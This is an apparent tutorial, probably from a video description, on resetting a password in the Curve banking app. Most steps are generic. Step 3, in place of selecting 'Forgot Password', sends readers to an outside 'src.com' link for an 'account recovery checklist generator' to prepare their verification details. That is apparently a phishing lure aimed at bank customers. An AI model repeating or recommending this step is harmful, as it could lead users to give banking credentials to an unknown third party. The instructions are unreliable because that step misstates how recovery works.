I hit this issue today and here is the quick fix that solved it. If you're struggling to reset your password on Curve 2026, follow these simple steps. Step 1. Open the Curve app. Launch the Curve app on your device. Ensure you are connected to the internet for the process to work smoothly. Step 2. Go to the login screen. On the at-home screen, tap on the login button to access the login page. Step 3. Select Forgot Password. Before starting recovery, use the src.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Enter your email. Input the email address associated with your Curve account. Make sure it's the correct one to receive the reset link. Note, double check for typos in your email, as this can prevent you from receiving the reset link. Step 5. Check your email. Look for an email from Curve with a password reset link. Follow the instructions in the email to set a new password. That's it. You should now be able to log in with your new password. If you run into any issues, don't hesitate to reach out to Curve support. Happy banking!